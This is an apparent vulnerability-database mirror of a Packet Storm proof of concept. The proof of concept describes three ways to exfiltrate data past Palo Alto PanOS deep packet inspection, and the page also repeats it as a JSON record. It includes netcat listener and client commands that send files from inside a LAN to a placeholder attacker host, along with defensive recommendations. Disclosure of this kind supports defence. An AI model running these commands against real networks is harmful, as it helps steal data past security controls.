📄 Palo Alto Deep Packet Inspection Information Disclosure_PACKETSTORM:212667

Description

Proof of concept code for Palo Alto deep packet inspection data exfiltration issues that appear to affect PanOS up to version 11.2.0...

Visit Original Source

Basic Information

ID PACKETSTORM:212667

Published Dec 10, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Palo Alto Deep Packet Inspection (DPI) Critical Vulnerabilities in Mechanism |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.paloaltonetworks.com/network-security/pan-os |
=============================================================================================================================================

POC :

[+] Summary

3 vulnerabilities in Palo Alto Deep Packet Inspection mechanism
Advisory URL: https://pierrekim.github.io/advisories/2025-palo-alto-dpi.txt
Blog URL: https://pierrekim.github.io/blog/2025-03-31-paloalto-dpi-3-vulnerabilities.html

[+] :: Product Description ::
------------------------------------------------------------
Palo Alto’s Next-Generation Firewalls provide advanced packet inspection technologies including Deep Packet Inspection (DPI).
They use App-ID technology to identify applications even when they attempt to evade detection through masquerading, port hopping, or encryption.

------------------------------------------------------------
[+] :: Vulnerability Summary ::
------------------------------------------------------------
Vulnerable versions: **All Palo Alto firewall versions**.

Versions tested (November 2024):
- PanOS 10.2.8 – vulnerable
- PanOS 10.2.9-h1 – vulnerable
- PanOS 11.1.4 – vulnerable
- PanOS 11.2.0 – vulnerable

[+] Three main vulnerabilities:

1. **Exfiltration of data via TCP/80 using “service-http”**
2. **Exfiltration of data via TCP/443 using “service-https”**
3. **Exfiltration of data via UDP to any port and any IP**
- Includes PoC: client.py and server.py

[+] :: Impact ::
------------------------------------------------------------
An attacker within the LAN can:
- Bypass Deep Packet Inspection
- Exfiltrate sensitive data to any external IP
- Using HTTP, HTTPS, or UDP
- Without any filtering or blocking

This makes networks relying solely on DPI rules **highly vulnerable to data exfiltration attacks**.

------------------------------------------------------------
[+] :: Recommendations ::
------------------------------------------------------------
- Do not use DPI rules without specifying destination IP ranges.
- Always define IPv4/IPv6 ranges of allowed remote services.
- Use Palo Alto EDL when possible.
- Do not rely solely on App-ID to classify sensitive applications.

------------------------------------------------------------
[+] :: PoC Summary ::
------------------------------------------------------------

**Server (attacker on WAN) – listening on port 80:**

for i in $(seq 1 10); do nc -l -v -p 80 > exfiltration-http-$i; sleep 1; done

**Client (inside LAN) – sending random data:**

for i in $(seq 1 10); do nc -v <SERVER-IP> 80 < rand.hex; sleep 1.5; done

**Verification:**

sha256sum exfiltration-http-*

All received files match the original hash — confirming successful data exfiltration through the firewall.

------------------------------------------------------------
[+] :: Full Attack Execution (Working PoC) ::
------------------------------------------------------------

1. On the attacker/server side:

nc -l -v -p 80 > exfil-file

2. On the victim/client side inside LAN:

nc -v <SERVER-IP> 80 < file-to-exfiltrate.bin

3. The server receives the data despite DPI rules.

------------------------------------------------------------
[+] :: Conclusion ::
------------------------------------------------------------
The Deep Packet Inspection system in Palo Alto firewalls can be fully bypassed to leak data via HTTP/HTTPS/UDP without filtering.
Because the engine allows up to 256 KB before blocking, attackers can exfiltrate massive amounts of information.

**All networks relying solely on App-ID or DPI without strict IP-based rules are at severe risk of data exfiltration.**

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-12-10T17:38:16",
    "description": "Proof of concept code for Palo Alto deep packet inspection data exfiltration issues that appear to affect PanOS up to version 11.2.0...",
    "published": "2025-12-10T00:00:00",
    "modified": "2025-12-10T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Palo Alto Deep Packet Inspection Information Disclosure",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:212667",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Palo Alto Deep Packet Inspection (DPI) Critical Vulnerabilities in Mechanism                                                |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\n    | # Vendor    : https://www.paloaltonetworks.com/network-security/pan-os                                                                    |\n    =============================================================================================================================================\n    \n    POC :\n    \n    [+] Summary\n    \n       3 vulnerabilities in Palo Alto Deep Packet Inspection mechanism  \n       Advisory URL: https://pierrekim.github.io/advisories/2025-palo-alto-dpi.txt  \n       Blog URL: https://pierrekim.github.io/blog/2025-03-31-paloalto-dpi-3-vulnerabilities.html  \n    \n    [+] :: Product Description ::\n        ------------------------------------------------------------\n       Palo Alto\u2019s Next-Generation Firewalls provide advanced packet inspection technologies including Deep Packet Inspection (DPI).  \n        They use App-ID technology to identify applications even when they attempt to evade detection through masquerading, port hopping, or encryption.\n    \n       ------------------------------------------------------------\n    [+] :: Vulnerability Summary ::\n       ------------------------------------------------------------\n       Vulnerable versions: **All Palo Alto firewall versions**.\n    \n      Versions tested (November 2024):  \n      - PanOS 10.2.8 \u2013 vulnerable  \n      - PanOS 10.2.9-h1 \u2013 vulnerable  \n      - PanOS 11.1.4 \u2013 vulnerable  \n      - PanOS 11.2.0 \u2013 vulnerable  \n    \n    [+] Three main vulnerabilities:\n    \n       1. **Exfiltration of data via TCP/80 using \u201cservice-http\u201d**  \n       2. **Exfiltration of data via TCP/443 using \u201cservice-https\u201d**  \n       3. **Exfiltration of data via UDP to any port and any IP**  \n       - Includes PoC: client.py and server.py\n    \n    \n    [+] :: Impact ::\n    ------------------------------------------------------------\n      An attacker within the LAN can:  \n      - Bypass Deep Packet Inspection  \n      - Exfiltrate sensitive data to any external IP  \n      - Using HTTP, HTTPS, or UDP  \n      - Without any filtering or blocking  \n    \n       This makes networks relying solely on DPI rules **highly vulnerable to data exfiltration attacks**.\n    \n       ------------------------------------------------------------\n    [+] :: Recommendations ::\n       ------------------------------------------------------------\n       - Do not use DPI rules without specifying destination IP ranges.  \n       - Always define IPv4/IPv6 ranges of allowed remote services.  \n       - Use Palo Alto EDL when possible.  \n       - Do not rely solely on App-ID to classify sensitive applications.  \n    \n    ------------------------------------------------------------\n    [+] :: PoC Summary ::\n    ------------------------------------------------------------\n    \n    **Server (attacker on WAN) \u2013 listening on port 80:**\n    \n        for i in $(seq 1 10); do nc -l -v -p 80 > exfiltration-http-$i; sleep 1; done\n    \n    **Client (inside LAN) \u2013 sending random data:**\n    \n        for i in $(seq 1 10); do nc -v <SERVER-IP> 80 < rand.hex; sleep 1.5; done\n    \n    **Verification:**\n    \n        sha256sum exfiltration-http-*\n    \n    All received files match the original hash \u2014 confirming successful data exfiltration through the firewall.\n    \n    ------------------------------------------------------------\n    [+] :: Full Attack Execution (Working PoC) ::\n    ------------------------------------------------------------\n    \n    1. On the attacker/server side:\n    \n        nc -l -v -p 80 > exfil-file\n    \n    2. On the victim/client side inside LAN:\n    \n        nc -v <SERVER-IP> 80 < file-to-exfiltrate.bin\n    \n    3. The server receives the data despite DPI rules.\n    \n    ------------------------------------------------------------\n    [+] :: Conclusion ::\n    ------------------------------------------------------------\n    The Deep Packet Inspection system in Palo Alto firewalls can be fully bypassed to leak data via HTTP/HTTPS/UDP without filtering.  \n    Because the engine allows up to 256 KB before blocking, attackers can exfiltrate massive amounts of information.\n    \n    **All networks relying solely on App-ID or DPI without strict IP-based rules are at severe risk of data exfiltration.**\n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/212667",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/212667/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply